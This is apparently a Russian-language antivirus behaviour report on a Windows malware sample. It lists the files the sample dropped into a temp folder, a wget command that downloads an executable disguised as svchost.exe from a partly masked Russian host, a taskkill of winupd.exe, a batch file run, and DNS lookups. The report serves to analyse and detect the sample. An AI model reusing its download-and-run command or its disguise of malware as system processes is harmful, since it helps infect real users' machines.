Техническая информация
- '%TEMP%\1.tmp\svchost.exe'
- '%TEMP%\1.tmp\wget.exe' http://rg##st.ru/download/private/50372161/3bd8ae4dbae09b04677be4fa449ffa18/5d4b987ad7b653e8bc80570b5b79968efb1413bb/svchost.exe
- '%TEMP%\1.tmp\svchost.exe' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /f /im winupd.exe
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\winupd.bat" "
- %TEMP%\1.tmp\svchost.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\winupd.bat
- %TEMP%\1.tmp\wget.exe
- 'rg##st.ru':80
- rg##st.ru/download/private/50372161/3bd8ae4dbae09b04677be4fa449ffa18/5d4b987ad7b653e8bc80570b5b79968efb1413bb/svchost.exe
- DNS ASK rg##st.ru
- DNS ASK ya.ru
- ClassName: '(null)' WindowName: '(null)'